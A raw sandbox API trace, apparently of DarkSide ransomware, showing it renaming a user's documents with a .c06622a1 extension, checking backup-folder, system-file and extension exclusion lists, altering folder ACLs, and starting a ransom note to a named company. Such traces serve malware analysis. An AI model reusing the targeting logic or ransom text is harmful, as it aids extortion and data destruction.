(in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt" [0158.568] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt") returned 0x64 [0158.568] wcscpy (in: _Dest=0x32b0160, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.568] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\zthhbgzl_pju.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\zthhbgzl_pju.ppt.c06622a1"), dwFlags=0x8) returned 1 [0158.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\zthhbgzl_pju.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0158.570] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.570] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17ac6fd8 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3afe3069 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x406dc1b6 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23034430 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32d24ac2 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e0b1030 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d438fd0 [0158.576] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5cd43dbe [0158.579] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x771f4a20 [0158.579] RtlComputeCrc32 (PartialCrc=0x4a20, Buffer=0x710094, Length=0x80) returned 0x914b3fb2 [0158.579] RtlComputeCrc32 (PartialCrc=0x3fb2, Buffer=0x710094, Length=0x80) returned 0x5cc03d60 [0158.579] RtlComputeCrc32 (PartialCrc=0x3d60, Buffer=0x710094, Length=0x80) returned 0x7995cc1b [0158.579] RtlComputeCrc32 (PartialCrc=0xcc1b, Buffer=0x710094, Length=0x80) returned 0xe622dab6 [0158.580] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.580] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.581] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.582] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.582] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0158.582] _wcsicmp (_Str1="backup", _Str2="88lX_mh5lpPm") returned 42 [0158.582] wcslen (_String="backup") returned 0x6 [0158.582] _wcsicmp (_Str1="bak", _Str2="88lX_mh5lpPm") returned 42 [0158.582] wcslen (_String="bak") returned 0x3 [0158.582] _wcsicmp (_Str1="back", _Str2="88lX_mh5lpPm") returned 42 [0158.582] wcslen (_String="back") returned 0x4 [0158.582] _wcsicmp (_Str1="archive", _Str2="88lX_mh5lpPm") returned 41 [0158.582] wcslen (_String="archive") returned 0x7 [0158.583] _wcsicmp (_Str1="bckp", _Str2="88lX_mh5lpPm") returned 42 [0158.583] wcslen (_String="bckp") returned 0x4 [0158.583] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.585] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.588] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309ecd20, ftCreationTime.dwHighDateTime=0x1d5ddcf, ftLastAccessTime.dwLowDateTime=0x32d90680, ftLastAccessTime.dwHighDateTime=0x1d5e763, ftLastWriteTime.dwLowDateTime=0x32d90680, ftLastWriteTime.dwHighDateTime=0x1d5e763, nFileSizeHigh=0x0, nFileSizeLow=0x17c7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="gnHK8.doc", cAlternateFileName="")) returned 1 [0158.588] _wcsicmp (_Str1="gnHK8.doc", _Str2="README.c06622a1.TXT") returned -11 [0158.588] wcsstr (_Str="gnHK8.doc", _SubStr="README") returned 0x0 [0158.588] _wcsicmp (_Str1="autorun.inf", _Str2="gnHK8.doc") returned -6 [0158.588] wcslen (_String="autorun.inf") returned 0xb [0158.588] _wcsicmp (_Str1="boot.ini", _Str2="gnHK8.doc") returned -5 [0158.588] wcslen (_String="boot.ini") returned 0x8 [0158.588] _wcsicmp (_Str1="bootfont.bin", _Str2="gnHK8.doc") returned -5 [0158.588] wcslen (_String="bootfont.bin") returned 0xc [0158.588] _wcsicmp (_Str1="bootsect.bak", _Str2="gnHK8.doc") returned -5 [0158.588] wcslen (_String="bootsect.bak") returned 0xc [0158.588] _wcsicmp (_Str1="desktop.ini", _Str2="gnHK8.doc") returned -3 [0158.588] wcslen (_String="desktop.ini") returned 0xb [0158.588] _wcsicmp (_Str1="iconcache.db", _Str2="gnHK8.doc") returned 2 [0158.589] wcslen (_String="iconcache.db") returned 0xc [0158.589] _wcsicmp (_Str1="ntldr", _Str2="gnHK8.doc") returned 7 [0158.589] wcslen (_String="ntldr") returned 0x5 [0158.589] _wcsicmp (_Str1="ntuser.dat", _Str2="gnHK8.doc") returned 7 [0158.589] wcslen (_String="ntuser.dat") returned 0xa [0158.589] _wcsicmp (_Str1="ntuser.dat.log", _Str2="gnHK8.doc") returned 7 [0158.589] wcslen (_String="ntuser.dat.log") returned 0xe [0158.589] _wcsicmp (_Str1="ntuser.ini", _Str2="gnHK8.doc") returned 7 [0158.589] wcslen (_String="ntuser.ini") returned 0xa [0158.589] _wcsicmp (_Str1="thumbs.db", _Str2="gnHK8.doc") returned 13 [0158.589] wcslen (_String="thumbs.db") returned 0x9 [0158.589] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0158.589] wcslen (_String="386") returned 0x3 [0158.589] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0158.589] wcslen (_String="adv") returned 0x3 [0158.589] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0158.589] wcslen (_String="ani") returned 0x3 [0158.589] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0158.589] wcslen (_String="bat") returned 0x3 [0158.589] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0158.590] wcslen (_String="bin") returned 0x3 [0158.590] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0158.590] wcslen (_String="cab") returned 0x3 [0158.590] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0158.590] wcslen (_String="cmd") returned 0x3 [0158.590] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0158.590] wcslen (_String="com") returned 0x3 [0158.590] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0158.590] wcslen (_String="cpl") returned 0x3 [0158.590] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0158.590] wcslen (_String="cur") returned 0x3 [0158.590] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0158.590] wcslen (_String="deskthemepack") returned 0xd [0158.590] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0158.590] wcslen (_String="diagcab") returned 0x7 [0158.590] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0158.590] wcslen (_String="diagcfg") returned 0x7 [0158.590] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0158.590] wcslen (_String="diagpkg") returned 0x7 [0158.590] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0158.590] wcslen (_String="dll") returned 0x3 [0158.590] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0158.590] wcslen (_String="drv") returned 0x3 [0158.590] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0158.590] wcslen (_String="exe") returned 0x3 [0158.590] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0158.591] wcslen (_String="hlp") returned 0x3 [0158.591] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0158.591] wcslen (_String="icl") returned 0x3 [0158.591] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0158.591] wcslen (_String="icns") returned 0x4 [0158.591] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0158.591] wcslen (_String="ico") returned 0x3 [0158.591] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0158.591] wcslen (_String="ics") returned 0x3 [0158.591] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0158.591] wcslen (_String="idx") returned 0x3 [0158.591] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0158.591] wcslen (_String="ldf") returned 0x3 [0158.591] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0158.591] wcslen (_String="lnk") returned 0x3 [0158.591] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0158.591] wcslen (_String="mod") returned 0x3 [0158.591] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0158.591] wcslen (_String="mpa") returned 0x3 [0158.591] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0158.591] wcslen (_String="msc") returned 0x3 [0158.591] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0158.591] wcslen (_String="msp") returned 0x3 [0158.591] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0158.591] wcslen (_String="msstyles") returned 0x8 [0158.591] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0158.591] wcslen (_String="msu") returned 0x3 [0158.591] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0158.591] wcslen (_String="nls") returned 0x3 [0158.591] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0158.591] wcslen (_String="nomedia") returned 0x7 [0158.591] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0158.591] wcslen (_String="ocx") returned 0x3 [0158.592] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0158.592] wcslen (_String="prf") returned 0x3 [0158.592] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0158.592] wcslen (_String="ps1") returned 0x3 [0158.592] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0158.592] wcslen (_String="rom") returned 0x3 [0158.592] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0158.592] wcslen (_String="rtp") returned 0x3 [0158.592] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0158.592] wcslen (_String="scr") returned 0x3 [0158.592] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0158.592] wcslen (_String="shs") returned 0x3 [0158.592] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0158.592] wcslen (_String="spl") returned 0x3 [0158.592] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0158.592] wcslen (_String="sys") returned 0x3 [0158.592] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0158.592] wcslen (_String="theme") returned 0x5 [0158.592] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0158.592] wcslen (_String="themepack") returned 0x9 [0158.592] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0158.592] wcslen (_String="wpx") returned 0x3 [0158.592] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0158.592] wcslen (_String="lock") returned 0x4 [0158.592] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0158.592] wcslen (_String="key") returned 0x3 [0158.592] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0158.592] wcslen (_String="hta") returned 0x3 [0158.592] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0158.592] wcslen (_String="msi") returned 0x3 [0158.592] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0158.592] wcslen (_String="pdb") returned 0x3 [0158.593] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0158.593] wcslen (_String="sqlite") returned 0x6 [0158.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac")) returned 0x10 [0158.593] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.593] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" [0158.593] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned 0x46 [0158.593] wcscpy (in: _Dest=0x3270106, _Source="gnHK8.doc" | out: _Dest="gnHK8.doc") returned="gnHK8.doc" [0158.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc", dwFileAttributes=0x80) returned 1 [0158.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\gnhk8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0158.594] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.594] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0158.595] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x1e2d38eb [0158.595] RtlComputeCrc32 (PartialCrc=0x38eb, Buffer=0x32e724, Length=0x80) returned 0x62f2aae0 [0158.595] RtlComputeCrc32 (PartialCrc=0xaae0, Buffer=0x32e724, Length=0x80) returned 0x56329af0 [0158.595] RtlComputeCrc32 (PartialCrc=0x9af0, Buffer=0x32e724, Length=0x80) returned 0x7401d22c [0158.595] RtlComputeCrc32 (PartialCrc=0xd22c, Buffer=0x32e724, Length=0x80) returned 0x67cb07f1 [0158.595] CloseHandle (hObject=0x1f0) returned 1 [0158.595] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.595] wcscpy (in: _Dest=0x3280080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc" [0158.595] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc") returned 0x50 [0158.595] wcscpy (in: _Dest=0x3280120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.595] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\gnhk8.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\gnhk8.doc.c06622a1"), dwFlags=0x8) returned 1 [0158.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\gnHK8.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\gnhk8.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0158.597] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.598] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0158.613] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ad7c3aa [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57f63136 [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72389a28 [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18a3ebf1 [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x131f33e [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24ec3dc4 [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x560e3f37 [0158.614] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fc65a7d [0158.617] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x44dbd419 [0158.617] RtlComputeCrc32 (PartialCrc=0xd419, Buffer=0x2b70094, Length=0x80) returned 0xf9f61f9f [0158.617] RtlComputeCrc32 (PartialCrc=0x1f9f, Buffer=0x2b70094, Length=0x80) returned 0x8a2043e4 [0158.617] RtlComputeCrc32 (PartialCrc=0x43e4, Buffer=0x2b70094, Length=0x80) returned 0x4b13df99 [0158.617] RtlComputeCrc32 (PartialCrc=0xdf99, Buffer=0x2b70094, Length=0x80) returned 0xcfc2bc77 [0158.617] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0158.617] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.617] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.618] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bfe7ac0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8bfe7ac0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bfe7ac0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.618] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.618] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a70a1a0, ftCreationTime.dwHighDateTime=0x1d5d914, ftLastAccessTime.dwLowDateTime=0xa7d24c20, ftLastAccessTime.dwHighDateTime=0x1d5dc4c, ftLastWriteTime.dwLowDateTime=0xa7d24c20, ftLastWriteTime.dwHighDateTime=0x1d5dc4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ryzV8yuUzx3uE", cAlternateFileName="RYZV8Y~1")) returned 1 [0158.618] _wcsicmp (_Str1="$recycle.bin", _Str2="ryzV8yuUzx3uE") returned -78 [0158.618] wcslen (_String="$recycle.bin") returned 0xc [0158.618] _wcsicmp (_Str1="config.msi", _Str2="ryzV8yuUzx3uE") returned -15 [0158.618] wcslen (_String="config.msi") returned 0xa [0158.618] _wcsicmp (_Str1="$windows.~bt", _Str2="ryzV8yuUzx3uE") returned -78 [0158.618] wcslen (_String="$windows.~bt") returned 0xc [0158.618] _wcsicmp (_Str1="$windows.~ws", _Str2="ryzV8yuUzx3uE") returned -78 [0158.618] wcslen (_String="$windows.~ws") returned 0xc [0158.618] _wcsicmp (_Str1="windows", _Str2="ryzV8yuUzx3uE") returned 5 [0158.619] wcslen (_String="windows") returned 0x7 [0158.619] _wcsicmp (_Str1="appdata", _Str2="ryzV8yuUzx3uE") returned -17 [0158.619] wcslen (_String="appdata") returned 0x7 [0158.619] _wcsicmp (_Str1="application data", _Str2="ryzV8yuUzx3uE") returned -17 [0158.619] wcslen (_String="application data") returned 0x10 [0158.619] _wcsicmp (_Str1="boot", _Str2="ryzV8yuUzx3uE") returned -16 [0158.619] wcslen (_String="boot") returned 0x4 [0158.619] _wcsicmp (_Str1="google", _Str2="ryzV8yuUzx3uE") returned -11 [0158.619] wcslen (_String="google") returned 0x6 [0158.619] _wcsicmp (_Str1="mozilla", _Str2="ryzV8yuUzx3uE") returned -5 [0158.619] wcslen (_String="mozilla") returned 0x7 [0158.619] _wcsicmp (_Str1="program files", _Str2="ryzV8yuUzx3uE") returned -2 [0158.619] wcslen (_String="program files") returned 0xd [0158.619] _wcsicmp (_Str1="program files (x86)", _Str2="ryzV8yuUzx3uE") returned -2 [0158.619] wcslen (_String="program files (x86)") returned 0x13 [0158.619] _wcsicmp (_Str1="programdata", _Str2="ryzV8yuUzx3uE") returned -2 [0158.619] wcslen (_String="programdata") returned 0xb [0158.619] _wcsicmp (_Str1="system volume information", _Str2="ryzV8yuUzx3uE") returned 1 [0158.619] wcslen (_String="system volume information") returned 0x19 [0158.619] _wcsicmp (_Str1="tor browser", _Str2="ryzV8yuUzx3uE") returned 2 [0158.619] wcslen (_String="tor browser") returned 0xb [0158.619] _wcsicmp (_Str1="windows.old", _Str2="ryzV8yuUzx3uE") returned 5 [0158.619] wcslen (_String="windows.old") returned 0xb [0158.619] _wcsicmp (_Str1="intel", _Str2="ryzV8yuUzx3uE") returned -9 [0158.619] wcslen (_String="intel") returned 0x5 [0158.619] _wcsicmp (_Str1="msocache", _Str2="ryzV8yuUzx3uE") returned -5 [0158.619] wcslen (_String="msocache") returned 0x8 [0158.619] _wcsicmp (_Str1="perflogs", _Str2="ryzV8yuUzx3uE") returned -2 [0158.619] wcslen (_String="perflogs") returned 0x8 [0158.620] _wcsicmp (_Str1="x64dbg", _Str2="ryzV8yuUzx3uE") returned 6 [0158.620] wcslen (_String="x64dbg") returned 0x6 [0158.620] _wcsicmp (_Str1="public", _Str2="ryzV8yuUzx3uE") returned -2 [0158.620] wcslen (_String="public") returned 0x6 [0158.620] _wcsicmp (_Str1="all users", _Str2="ryzV8yuUzx3uE") returned -17 [0158.620] wcslen (_String="all users") returned 0x9 [0158.620] _wcsicmp (_Str1="default", _Str2="ryzV8yuUzx3uE") returned -14 [0158.620] wcslen (_String="default") returned 0x7 [0158.620] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" [0158.620] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned 0x48 [0158.620] wcscpy (in: _Dest=0x32500f6, _Source="ryzV8yuUzx3uE" | out: _Dest="ryzV8yuUzx3uE") returned="ryzV8yuUzx3uE" [0158.620] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.620] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.622] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.622] GetNamedSecurityInfoW () returned 0x0 [0158.622] SetEntriesInAclW () returned 0x0 [0158.622] SetNamedSecurityInfoW () returned 0x0 [0158.626] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b208) returned 1 [0158.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.626] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 1 [0158.626] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not 